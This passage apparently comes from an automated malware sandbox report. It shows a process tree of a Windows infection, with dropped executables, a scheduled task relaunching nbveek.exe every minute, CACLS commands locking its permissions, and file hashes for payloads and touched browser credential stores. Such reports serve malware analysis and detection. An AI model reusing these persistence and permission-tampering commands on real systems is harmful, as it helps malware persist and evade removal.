                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:2500
                                                      • C:\Windows\system32\rundll32.exe
                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                        1⤵
                                                        • Process spawned unexpected child process
                                                        PID:1516
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                          2⤵
                                                          • Loads dropped DLL
                                                          PID:3756
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 600
                                                            3⤵
                                                            • Program crash
                                                            PID:4592
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3756 -ip 3756
                                                        1⤵
                                                          PID:4184
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4032 -ip 4032
                                                          1⤵
                                                            PID:3348
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                            1⤵
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:4360
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa663a4f50,0x7ffa663a4f60,0x7ffa663a4f70
                                                              2⤵
                                                                PID:2268
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1988 /prefetch:8
                                                                2⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5176
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:2
                                                                2⤵
                                                                  PID:5160
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 /prefetch:8
                                                                  2⤵
                                                                    PID:5292
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
                                                                    2⤵
                                                                      PID:5488
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2916 /prefetch:1
                                                                      2⤵
                                                                        PID:5480
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
                                                                        2⤵
                                                                          PID:5584
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 /prefetch:8
                                                                          2⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:6016
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:8
                                                                          2⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:6044
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5048 /prefetch:8
                                                                          2⤵
                                                                            PID:116
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4812 /prefetch:8
                                                                            2⤵
                                                                              PID:4820
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4792 /prefetch:8
                                                                              2⤵
                                                                                PID:4900
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:8
                                                                                2⤵
                                                                                  PID:6028
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5452 /prefetch:8
                                                                                  2⤵
                                                                                    PID:6024
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:8
                                                                                    2⤵
                                                                                      PID:1408
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5672 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2152
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4068 /prefetch:8
                                                                                        2⤵
                                                                                          PID:5664
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4712
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6028 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4676
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5508 /prefetch:8
                                                                                              2⤵
                                                                                                PID:3504
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6424 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:2352
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6572 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:3108
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:3324
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:5968
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:4028
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:6084
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6212 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:5580
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4964 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:5572
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:5216
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6584 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:6012
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5376 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5636
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3524 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5596
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1544 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:6080
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:612
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1072 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:3100
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,2237201932702756073,5210100634858989828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:5692
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2360 -ip 2360
                                                                                                                              1⤵
                                                                                                                                PID:3376
                                                                                                                              • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4928
                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:5456
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4336 -ip 4336
                                                                                                                                    1⤵
                                                                                                                                      PID:848
                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 552 -p 1408 -ip 1408
                                                                                                                                      1⤵
                                                                                                                                        PID:1452
                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 488 -p 5004 -ip 5004
                                                                                                                                        1⤵
                                                                                                                                          PID:2152
                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:5612
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:1228
                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 548 -p 3904 -ip 3904
                                                                                                                                            1⤵
                                                                                                                                              PID:1528
                                                                                                                                            • C:\Users\Admin\Desktop\adwcleaner.exe
                                                                                                                                              "C:\Users\Admin\Desktop\adwcleaner.exe"
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:5696
                                                                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                                                                "C:\Windows\System32\netsh.exe" winsock reset
                                                                                                                                                2⤵
                                                                                                                                                  PID:5804
                                                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                1⤵
                                                                                                                                                  PID:6080
                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3292
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5560
                                                                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4912
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5616
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
                                                                                                                                                            2⤵
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:5512
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3368
                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                CACLS "nbveek.exe" /P "Admin:N"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3532
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5344
                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                    CACLS "nbveek.exe" /P "Admin:R" /E
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1840
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5668
                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                        CACLS "..\16de06bfb4" /P "Admin:N"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5888
                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                          CACLS "..\16de06bfb4" /P "Admin:R" /E
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5872

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\portu1.exe.log

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        b5845e87f19c4920b2f2097fc185b87a

                                                                                                                                                                        SHA1

                                                                                                                                                                        4aeea82289c152ca6f1b7bcb221a6c348e1de1bb

                                                                                                                                                                        SHA256

                                                                                                                                                                        d86ea87c5bbce2537e5058ecc340ff2568dc38975f65889a19cc046743aa35c5

                                                                                                                                                                        SHA512

                                                                                                                                                                        5b66ea29d2ea9bba584bbbe515aee1dba5ccbf2b295f8cedf1ccdbbdee9b10e76508d3c8b7f69340ccc6ac660af648b5b2d11cc3f9c0788286e59d1473df7feb

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                                                                                                                                                        Filesize

                                                                                                                                                                        20KB

                                                                                                                                                                        MD5

                                                                                                                                                                        cba2b3a7bb891796363c82ead8874fd0

                                                                                                                                                                        SHA1

                                                                                                                                                                        f38736f3b138966f70ee4886e01f7ad0c09f23ef

                                                                                                                                                                        SHA256

                                                                                                                                                                        a905eeba9d9f8283dd3a4d03c9c16b576833b4b2737a39916d0d4f20eca3fbdc

                                                                                                                                                                        SHA512

                                                                                                                                                                        5a966dccf07f7719252b0008907c957ba93d62e6ca7aa6683f949a10a8fce17d03263c9605381d69dceeba263514bf805777322703733e57f45596a8b5b2d495

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                        Filesize

                                                                                                                                                                        116KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f70aa3fa04f0536280f872ad17973c3d

                                                                                                                                                                        SHA1

                                                                                                                                                                        50a7b889329a92de1b272d0ecf5fce87395d3123

                                                                                                                                                                        SHA256

                                                                                                                                                                        8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                                                                                                                                        SHA512

                                                                                                                                                                        30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        9KB

                                                                                                                                                                        MD5

                                                                                                                                                                        fc26070c79ae91e32b8769077ab0175b

                                                                                                                                                                        SHA1

                                                                                                                                                                        4a35669a19b7ded0ad1ab5fe863e569c66d8fa15

                                                                                                                                                                        SHA256

                                                                                                                                                                        9f2733a1cd6ea60fe8b92be88f83f624a47a5826b7e7c988aea8d1a807ebdb30

                                                                                                                                                                        SHA512

                                                                                                                                                                        0a289edc2ab91dfa815bd0aee251d0ed72f168ef0d6d7e4d1bff2a20c7d2d5e402c4686d08d9bbbbdf337e017843da82a285fcf5cf7ed78c98c1bb762a942886

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\48VMALJK\portu1[1].exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        426KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f784536b061912d6195a530f9f06791a

                                                                                                                                                                        SHA1

                                                                                                                                                                        621f09d398ab8c5aec84d1bc385f47059b5b3646

                                                                                                                                                                        SHA256

                                                                                                                                                                        00c9bdafbec20c6fdc3e99240423cd8582147c7b3b411eacb32db42dec3ca0d9

                                                                                                                                                                        SHA512

                                                                                                                                                                        02a654ca82f1004181e7356fc09a4feb2961612210f55deb723e7c3e30421b408e8ff607b04c3cb003ab469cc6ca96821fb974f722c8aba60eeba493a78e6812

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000001001\portu1.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        426KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f784536b061912d6195a530f9f06791a

                                                                                                                                                                        SHA1

                                                                                                                                                                        621f09d398ab8c5aec84d1bc385f47059b5b3646

                                                                                                                                                                        SHA256

                                                                                                                                                                        00c9bdafbec20c6fdc3e99240423cd8582147c7b3b411eacb32db42dec3ca0d9

                                                                                                                                                                        SHA512

                                                                                                                                                                        02a654ca82f1004181e7356fc09a4feb2961612210f55deb723e7c3e30421b408e8ff607b04c3cb003ab469cc6ca96821fb974f722c8aba60eeba493a78e6812

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000001001\portu1.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        426KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f784536b061912d6195a530f9f06791a

                                                                                                                                                                        SHA1

                                                                                                                                                                        621f09d398ab8c5aec84d1bc385f47059b5b3646

                                                                                                                                                                        SHA256

                                                                                                                                                                        00c9bdafbec20c6fdc3e99240423cd8582147c7b3b411eacb32db42dec3ca0d9

                                                                                                                                                                        SHA512

                                                                                                                                                                        02a654ca82f1004181e7356fc09a4feb2961612210f55deb723e7c3e30421b408e8ff607b04c3cb003ab469cc6ca96821fb974f722c8aba60eeba493a78e6812

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        175KB

                                                                                                                                                                        MD5

                                                                                                                                                                        3a7231f311ff30f0a7e0a20db7b58642

                                                                                                                                                                        SHA1

                                                                                                                                                                        d180bd6d7d0245a22341f9bd46108e405a64e105

                                                                                                                                                                        SHA256

                                                                                                                                                                        e9edbc8953f1062edcef26096a0679e4a09aec6e92fd70ab0e5561ad783b67a3

                                                                                                                                                                        SHA512

                                                                                                                                                                        6ff279e8cd81d3453746898ce2773d01342cbac67de97272640dd43195fb0f08824a9b7c9b267bdd7c80da74526f98be9b266edfbfe72dc62c4cf580e1da509d

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        175KB

                                                                                                                                                                        MD5

                                                                                                                                                                        3a7231f311ff30f0a7e0a20db7b58642

                                                                                                                                                                        SHA1

                                                                                                                                                                        d180bd6d7d0245a22341f9bd46108e405a64e105

                                                                                                                                                                        SHA256

                                                                                                                                                                        e9edbc8953f1062edcef26096a0679e4a09aec6e92fd70ab0e5561ad783b67a3

                                                                                                                                                                        SHA512

                                                                                                                                                                        6ff279e8cd81d3453746898ce2773d01342cbac67de97272640dd43195fb0f08824a9b7c9b267bdd7c80da74526f98be9b266edfbfe72dc62c4cf580e1da509d

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000003051\portu1.exe

